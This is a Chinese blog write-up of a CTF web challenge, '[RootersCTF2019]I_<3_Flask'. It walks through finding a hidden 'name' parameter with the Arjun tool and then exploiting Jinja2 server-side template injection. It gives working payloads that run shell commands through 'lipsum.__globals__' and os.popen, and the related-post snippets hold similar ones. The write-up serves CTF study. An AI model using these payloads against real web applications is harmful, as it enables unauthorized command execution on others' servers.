[RootersCTF2019]I_<3_Flask

已于 2022-10-01 10:24:50 修改
阅读量620 收藏
点赞数
分类专栏: CTF # flask 文章标签: web安全
于 2022-07-23 15:14:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62905261/article/details/125947743
版权
CTF 同时被 2 个专栏收录
71 篇文章 0 订阅
订阅专栏
flask
3 篇文章 0 订阅
订阅专栏

[RootersCTF2019]I_<3_Flask

一道比较简单的ssti题目,难点在于寻找注入的参数

 发现了flask框架,寻找一下flask路由,f12没有发现什么东西,这里需要用到一个工具是Arjun,可以爆破我们所需要的参数:

下载:GitHub - s0md3v/Arjun: HTTP parameter discovery suite.

pip3 install arjun

python3 setup.py install

输入arjun -h查看版本,出现如下页面则安装成功:

arjun -u http://xxxxxxx.node4.buuoj.cn:81/ -c 100 -d 5

 接下来直接利用flask的一个方法:lipsum

可以用于得到__builtins__,而且lipsum.__globals__含有os模块:{{lipsum.__globals__['os'].popen('ls').read()}}

然后构建payload:/?name={{lipsum.__globals__['os'].popen('ls').read()}}

 

发现了flag.txt,直接用cat命令:

payload:/?name={{lipsum.__globals__['os'].popen('cat flag.txt').read()}}

一夜至秋.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
RootersCTF2019 I ♥ Flask
汗的博客
08-29 476
知识点 url参数爆破、ssti 信息收集 看了别人的wp,才知道http参数这方面的信息收集 这里使用arjun,当然也可以万能的burpsuite python3 arjun.py -u http:xxxxxxxxxxx.buuoj.cn/ --get 得到参数name 改成/?name={{3*3}} 利用和get flag 获取当前目录下文件列表 xxxxx.cn/?name={{config.__class__.__init__.__globals__['os'].popen('ls').
paddleOCR_flask_web服务化.rar
08-20
【标题】"paddleOCR_flask_web服务化.rar" 是一个使用PaddleOCR与Flask框架构建的Web服务项目,其主要目标是提供一个能够通过Web接口进行图像文字识别的服务。PaddleOCR是一款由阿里云开发的开源OCR(Optical ...
BUUCTF RootersCTF2019]I_<3_Flask
CyhDl666的博客
03-17 300
文章目录手注tplmap 手注 刚进入题目 知道是SSTI注入 但是没找到注入点 学到了一个新的工具 Arjun 扫描到get参数name ?name={{'aaa'.upper()}} 确定是SSTI注入 构造payload: {% for c in [].__class__.__base__.__subclasses__()%}{% if c.__name__== 'Popen' %}{{c.__init__.__globals__['os'].popen('ls').read()}}{% en
os模块
qq_45594312的博客
01-11 156
1.概述 os模块提供了多数操作系统的功能接口函数 当os模块被导入后,它会自适应于不同的操作系统平台,根据不同的平台进行相应的操作 在python编程时,经常和文件、目录打交道,所以离不了os模块 2.一些操作 1.返回操作系统类型 程序代码 运行结果 2.操作系统的详细信息 程序代码 运行结果 3.系统的环境边量 程序代码 运行结果 4.判断是否是绝对路径 程序代码 运行结...
BUUCTF [RootersCTF2019] I_<3_Flask
Senimo
12-19 1219
BUUCTF [RootersCTF2019] I_<3_Flask 考点: Jinjia2模版注入 Arjun参数爆破工具 tplmap模版注入工具 启动环境: 一道Flask题目,大概率为模版注入,先用Arjun工具对可利用传参进行爆破: python3 arjun.py -u http://xxx.node3.buuoj.cn/ -m GET -c 200 得到参数名:name 尝试传入值:?name=1 页面发生了变化,传参被成功执行,尝试模版注入: ?name={{2*2}}
第三次课c3.zip_flask_flask网站_网站 python
09-23
在本课程中,我们将深入探讨如何使用Python的Flask框架构建一个类似Instagram的网站。Flask是一个轻量级的Web服务器网关接口(WSGI)Web应用框架,它以其灵活性和简洁性而受到开发者的喜爱。这个“第三次课c3.zip”...
douban_flask_pythonflask豆瓣_python_
10-02
标题 "douban_flask_pythonflask豆瓣_python_" 暗示了这是一个使用 Python 的 Flask 框架来实现的项目,目标是爬取并处理豆瓣电影Top250的数据。Flask是一个轻量级的Web服务程序,适合用于构建小型到中型的Web应用。...
toutiao-backend_Flask框架_flask_
09-30
3. **用户体验**:前端界面设计应简洁易用,可能使用了Bootstrap、Vue.js或React.js等前端框架与Flask进行交互,实现动态加载和交互效果。 4. **性能优化**:随着用户量的增长,可能需要考虑缓存策略(如Redis)、...
flask_restplus.rar
07-02
《深入理解Flask Restplus:基于“再遇Flask restplus”博客的实践解析》 Flask Restplus,作为Python微框架Flask的一个扩展,专为构建RESTful API设计,提供了一种简单而强大的方式来组织和构建API。在本文中,...
基于变结构控制策略的转台控制技术研究
05-05
本文是硕士学位论文,题目是《基于变结构控制策略的转台控制研究》。
flask_pythonflask_flask书籍_图书管理系统_
10-03
《Flask Python Flask:构建图书管理系统》 在Python Web开发领域,Flask框架因其轻量级、灵活性和易于上手的特性,深受开发者喜爱。本系统以“图书管理系统”为应用背景,旨在帮助读者理解如何利用Flask构建一个...
python-flask-microservice_Flask框架_flask_phyton_
09-30
3. **模板(Template)**: Flask支持Jinja2模板引擎,允许开发者使用模板语言动态生成HTML页面。模板中可以包含变量、控制结构和继承等特性。 4. **上下文本地化(Context Localization)**: 每个请求都有自己的上...
blog-master.zip_flask_flask博客_flask系统_管理系统flask_系统
09-24
**Flask框架详解** Flask是一款轻量级的Web服务程序,由Armin Ronacher开发,基于Python语言。它的核心设计理念是保持简单和模块化,使得开发者能够快速地搭建小型Web应用,同时也能应对复杂的项目需求。Flask以其...
BUUCTF--[RootersCTF2019]I_<3_Flask
qq_46263951的博客
07-15 280
进入页面后发现并没有什么可以利用的地方 利用Arjun扫描可以得到一个参数name 接下来要利用SSTI模板注入 尝试模板注入,发现可以成功执行 ?name={{8*8}} 方法一: 直接可以利用此漏洞执行payload ?name={{lipsum.__globals__.os.popen('cat flag.txt').read()}} 方法二: 使用tplmap,可以得到是存在jinjia2模版注入再进行getshell即可拿到flag 由于我这边...
BUUCTF-[RootersCTF2019]I_<3_Flask
最新发布
weixin_49803180的博客
07-17 223
直接利用flask的一个方法:lipsum,在lipsum.__globals__含有os模块,利用方法:{{lipsum.__globals__['os'].popen('ls').read()}}name={{''.__class__.__base__.__subclasses__()[132].__init__}} #查看模块是否被加载。name={{%27%27.__class__.__base__.__subclasses__()}}#查看当前页面下,加载的子类。加载成功就可以利用了。
[rootersctf2019]i_<3_flask
04-09
不好意思,我是语言模型AI,无法直接回答该问题,但是我可以帮您翻译该问题的意思,该题目应该是一道CTF比赛中的题目,题目名称为"[rootersctf2019]i_<3_flask"。关于具体内容需要参加比赛的选手来解答。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值